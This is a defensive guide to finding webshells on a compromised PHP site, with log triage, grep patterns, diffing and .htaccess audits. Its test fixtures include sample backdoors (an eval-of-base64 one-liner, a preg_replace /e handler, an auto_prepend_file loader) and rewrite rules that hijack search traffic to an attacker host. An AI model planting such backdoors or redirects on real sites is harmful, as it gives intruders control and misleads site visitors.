0x01 View Access Log
Check the access log for signs of a file upload or of an uploaded script being driven, i.e. POST requests to PHP files inside directories that should only ever hold static uploads:
IPREMOVED - - [01/Mar/2013:06:16:48 -0600] "POST /uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
IPREMOVED - - [01/Mar/2013:06:12:58 -0600] "POST /public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
The source address, timestamp and path from such lines are what narrow down the file searches in the following sections.
These entries are in Nginx's default log format, the predefined combined format (client address, remote user, local time, request line, status code, bytes sent, referer and user agent). It is selected in nginx.conf with:
access_log logs/access.log combined;
By default Nginx writes its logs to:
<nginx install directory>/logs/
Distribution packages usually place them under /var/log/nginx/ instead; the access_log directive in the running configuration is authoritative.
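As an added example (not code from the original post), the following shell script applies that check to a few constructed log lines in the combined format and then pulls every request made by the source addresses that issued the suspicious POSTs, which is where the later use of an uploaded shell (GET requests with command parameters) usually shows up. The directory prefixes in the regular expression are an assumption about where this application keeps uploads; adjust them to the site being examined.

```shell
#!/bin/sh
# Added example, not code from the original post: triage an Nginx access log in
# the combined format for POST requests to PHP files under upload directories.
# The log lines below are constructed for this example; the path prefixes are
# an assumption about where the application stores user uploads.
SAMPLE_LOG=$(mktemp)
cat >"$SAMPLE_LOG" <<'EOF'
203.0.113.5 - - [01/Mar/2013:06:12:58 -0600] "POST /public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Mar/2013:06:14:01 -0600] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Mar/2013:06:16:48 -0600] "POST /uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Mar/2013:06:17:02 -0600] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Mar/2013:06:18:10 -0600] "GET /uploads/monthly_10_2012/view.php?cmd=id HTTP/1.1" 200 88 "-" "Mozilla/5.0"
EOF

# POST requests whose target is a .php file inside a directory that should only
# hold static uploads. In the combined format $6 is the quoted method ("POST)
# and $7 is the request path.
suspicious_posts() {
    awk '$6 == "\"POST" && $7 ~ /^\/(uploads|public\/style_images|wp-content\/uploads)\/.*\.php(\?|$)/' "$1"
}

# Every request made by the clients that issued those POSTs: once a shell is in
# place the same source usually starts invoking it, often via GET parameters.
requests_from_posters() {
    suspicious_posts "$1" | awk '{print $1}' | sort -u | while read -r ip; do
        grep -F -- "$ip - -" "$1"
    done
}

echo "== suspicious POSTs =="
suspicious_posts "$SAMPLE_LOG"
echo "== all requests from those source addresses =="
requests_from_posters "$SAMPLE_LOG"
```

On a real log, point both functions at the rotated files as well; the upload that planted the shell may be days older than the first POST that drives it.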
0x02 Find Files Containing Malicious PHP Code
2.1 Finding recently changed PHP files
find . -type f -name '*.php' -mtime -7
-type f restricts the search to regular files; -mtime -7 selects files modified within the last 7 days. Adjust the number of days to the time of compromise suggested by the access log.
The results may look like this:
./uploads/monthly_04_2008/index.php
./uploads/monthly_10_2008/index.php
./uploads/monthly_08_2009/template.php
./uploads/monthly_02_2013/index.php
2.2 Find out whether a file contains suspect code
(the " *" in each pattern matches any amount of whitespace between the function name and the opening parenthesis)
find . -type f -name '*.php' | xargs grep -l "base64_decode *(" --color
find . -type f -name '*.php' | xargs grep -l "gzinflate *(" --color
find . -type f -name '*.php' | xargs grep -l "eval *(str_rot13 *(base64_decode *(" --color
Note: many commands do not read their arguments from a pipe, so xargs is used to turn the file names produced by find into command-line arguments for grep. grep -l prints only the names of the files containing the string; without -l, grep prints every matching line instead.
The functions in these patterns mean the following:
eval(): executes a string as PHP code; this is the heart of the most common one-line PHP trojan (webshell)
base64_decode(): decodes a base64 string; attack payloads are usually base64-encoded, so this function is a strong marker
gzinflate(): decompresses a string; used when the payload was compressed with gzdeflate() to shrink and obscure it
str_rot13(): applies the rot13 substitution to a string, another trivial obfuscation layer
You can also search with a regular expression to find such code in one pass:
find . -type f -name '*.php' | xargs egrep -i "(mail|fsockopen|pfsockopen|stream_socket_client|exec|system|passthru|eval|base64_decode) *("
The functions commonly used by webshells are:
mail(): can be used to send spam to the site's users
fsockopen(): opens a network connection or a Unix domain socket; used to send payloads or requests to remote hosts
pfsockopen(): persistent variant of fsockopen()
stream_socket_client(): establishes a remote connection, as in the following example:
<?php
$fp = stream_socket_client("tcp://www.example.com:80", $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
} else {
    fwrite($fp, "GET / HTTP/1.0\r\nHost: www.example.com\r\nAccept: */*\r\n\r\n");
    while (!feof($fp)) {
        echo fgets($fp, 1024);
    }
    fclose($fp);
}
?>
exec(): command execution
system(): like exec(), but prints the command output
passthru(): like exec(), but passes raw command output straight to the client
preg_replace() with the e modifier on the pattern evaluates the replacement string as PHP code before substituting it (the modifier is deprecated since PHP 5.5 and removed in PHP 7.0, but older installations still honour it), so this case has to be covered too. The following scan finds it:
find . -type f -name '*.php' | xargs egrep -i "preg_replace *\(([‘|\"])(.).*\2[a-z]*e[^\1]*\1 *," --color
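To turn the individual greps of section 2.2 and the preg_replace /e check into one ranking, here is an added example (not code from the original post) that scores each PHP file by the number of distinct flagged constructs it contains. The three PHP files it creates are constructed for the example, the base64 string inside view.php is a placeholder rather than a real payload, and the list of function names is an assumption that should be extended to whatever the application under review never legitimately calls.

```shell
#!/bin/sh
# Added example, not code from the original post: rank PHP files by how many of
# the constructs discussed above they contain, including preg_replace() with
# the e modifier. The files under $WEBROOT are constructed for this example and
# the base64 string in view.php is a placeholder, not a working payload.
umask 022
WEBROOT=$(mktemp -d)
mkdir -p "$WEBROOT/uploads/monthly_10_2012" "$WEBROOT/lib"

# Classic one-line backdoor: base64 -> inflate -> eval.
cat >"$WEBROOT/uploads/monthly_10_2012/view.php" <<'EOF'
<?php eval(gzinflate(base64_decode('cGxhY2Vob2xkZXI='))); ?>
EOF

# preg_replace() with the e modifier: the replacement is executed as PHP code.
cat >"$WEBROOT/uploads/monthly_10_2012/index.php" <<'EOF'
<?php preg_replace("/.*/e", $_POST['x'], ''); ?>
EOF

# Legitimate helper: base64_encode() is not on the list and must not score.
cat >"$WEBROOT/lib/helper.php" <<'EOF'
<?php
function encode_token($t) { return base64_encode($t); }
EOF

# Function names worth flagging; " *" allows whitespace before the parenthesis.
DANGEROUS='(eval|assert|base64_decode|gzinflate|str_rot13|exec|shell_exec|system|passthru|fsockopen|pfsockopen|stream_socket_client) *\('
# preg_replace("<delim>...<delim>mods", ...): group 1 is the quote character,
# group 2 the pattern delimiter, and the modifier list between the closing
# delimiter and the closing quote must contain an e.
PREG_E="preg_replace *\\( *(['\"])(.)(.*)\\2[a-z]*e[a-z]*\\1"

# Number of distinct flagged constructs in one file, plus one for preg_replace /e.
score_file() {
    n=$(grep -oiE "$DANGEROUS" "$1" | tr -d ' (' | tr 'A-Z' 'a-z' | sort -u | wc -l | tr -d ' ')
    if grep -qiE "$PREG_E" "$1"; then
        n=$((n + 1))
    fi
    echo "$n"
}

# "score path" for every PHP file with a non-zero score, highest first.
scan_tree() {
    find "$1" -type f -name '*.php' | while read -r f; do
        s=$(score_file "$f")
        if [ "$s" -gt 0 ]; then
            echo "$s $f"
        fi
    done | sort -rn
}

scan_tree "$WEBROOT"
```

Scores are a triage aid, not a verdict: a framework's own code may legitimately call exec() or base64_decode(), so the high-scoring files still need to be read, and the comparison against a clean copy in 0x03 is the more reliable test where a clean copy exists.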
0x03 Comparing Code Files
This requires a clean copy of the code, which is compared against the code in use. For example:
diff -r wordpress-clean/ wordpress-compromised/ -x wp-content
The example above compares the wordpress-clean/ and wordpress-compromised/ directories recursively and skips the wp-content/ subdirectory, which differs between installations anyway (uploads, themes, plugins). In the output, "Only in wordpress-compromised/..." lines point to added files and the remaining hunks to modified ones; wp-content/ then has to be checked separately with the searches above.
0x04 Search for Writable Directories
Check these directories for suspicious files. The following script lists the PHP files in every directory whose permissions are 777:
search_dir=$(pwd)
writable_dirs=$(find "$search_dir" -type d -perm 0777)
for dir in $writable_dirs
do
    #echo $dir
    find "$dir" -type f -name '*.php'
done
Attackers often hide PHP code inside a JPG file (which is then included from a script or renamed later), so image files in these directories should be checked as well:
find wp-content/uploads -type f -iname '*.jpg' | xargs grep -i php
Note: -iname makes the file-name match case-insensitive, and grep -i makes the content match case-insensitive too.
0x05 Detecting IFRAME Tags
A common way of planting malware is to embed a hidden iframe, so save the page source to a file and search it for iframe tags:
grep -i '<iframe' mywebsite.txt
For dynamically generated pages, capture the response actually served to the browser (for example with the Firefox Live HTTP Headers extension) and search that for iframe tags, since the injected content may only appear at request time and not in the files on disk.
0x06 Find Out Whether Sensitive Strings Exist in the Database
Injected content is often stored in the database rather than in files, so search the content tables with LIKE patterns for the keywords mentioned above, such as %base64_%, %eval(% and %<iframe%.
0x07 Checking .htaccess Files
Check whether any .htaccess file sets auto_prepend_file or auto_append_file with the following commands:
find . -type f -name '\.htaccess' | xargs grep -i auto_prepend_file
find . -type f -name '\.htaccess' | xargs grep -i auto_append_file
auto_prepend_file causes the named file to be loaded before every PHP script runs, and auto_append_file loads it after every script. If an attacker can modify a .htaccess file (on a server that lets .htaccess set php_value directives), the malicious file is loaded whenever any PHP script in that directory is accessed, without touching the scripts themselves.
A .htaccess file can also be used to hijack the site's traffic to the attacker's site:
RewriteCond %{HTTP_USER_AGENT} ^.*Baiduspider.*$
RewriteRule ^(.*)$ http://www.hacker.com/muma.php [R=301]
This redirects visits from the Baidu crawler to the attacker's site (note the HTTP_USER_AGENT and http keywords).
RewriteCond %{HTTP_REFERER} ^.*baidu.com.*$
RewriteRule ^(.*)$ http://www.hacker.com/muma.php [R=301]
This redirects visitors arriving from the Baidu search engine to the attacker's site (note the HTTP_REFERER and http keywords). Because only crawler or search traffic is redirected, the site owner browsing the site directly never notices. To see whether the site's .htaccess files have been modified for traffic hijacking, search them with the following commands:
find . -type f -name '\.htaccess' | xargs grep -i http
find . -type f -name '\.htaccess' | xargs grep -i HTTP_USER_AGENT
find . -type f -name '\.htaccess' | xargs grep -i HTTP_REFERER
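As an added example (not code from the original post), the following script audits every .htaccess file under a web root for both abuses described in this section: php_value auto_prepend_file / auto_append_file, and rewrite rules that redirect to an external host while conditioning on the user agent or referer. The three .htaccess files are constructed for the example, and hacker.example is a placeholder host name.

```shell
#!/bin/sh
# Added example, not code from the original post: audit .htaccess files for
# auto_prepend_file / auto_append_file and for conditional external redirects.
# The files are constructed for this example; hacker.example is a placeholder.
umask 022
WEBROOT=$(mktemp -d)
mkdir -p "$WEBROOT/wp-content/uploads" "$WEBROOT/blog"

# Ordinary WordPress-style rewrite: internal target, no user-agent/referer condition.
cat >"$WEBROOT/.htaccess" <<'EOF'
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
EOF

# Backdoor loader: every PHP request in this directory first includes the "image".
cat >"$WEBROOT/wp-content/uploads/.htaccess" <<'EOF'
php_value auto_prepend_file /var/www/html/wp-content/uploads/logo.jpg
EOF

# Traffic hijack: only crawler or search-engine visitors are redirected.
cat >"$WEBROOT/blog/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^.*Baiduspider.*$ [OR]
RewriteCond %{HTTP_REFERER} ^.*baidu\.com.*$
RewriteRule ^(.*)$ http://hacker.example/muma.php [R=301,L]
EOF

# .htaccess files that inject a file into every PHP script in their directory.
prepend_append_hits() {
    find "$1" -name '.htaccess' -type f -exec grep -liE 'auto_(prepend|append)_file' {} + || true
}

# .htaccess files that redirect to another host (http:// or https:// target)
# while conditioning on the user agent or the referer.
hijack_hits() {
    find "$1" -name '.htaccess' -type f | while read -r f; do
        if grep -qiE 'RewriteCond +%\{HTTP_(USER_AGENT|REFERER)\}' "$f" \
           && grep -qiE 'RewriteRule .* https?://' "$f"; then
            echo "$f"
        fi
    done
}

audit_htaccess() {
    echo "== auto_prepend_file / auto_append_file =="
    prepend_append_hits "$1"
    echo "== conditional external redirects =="
    hijack_hits "$1"
}

audit_htaccess "$WEBROOT"
```

Requiring both a user-agent or referer condition and an external redirect target keeps the normal front-controller rewrite in the root .htaccess out of the report, which plain greps for "http" would flag on many sites.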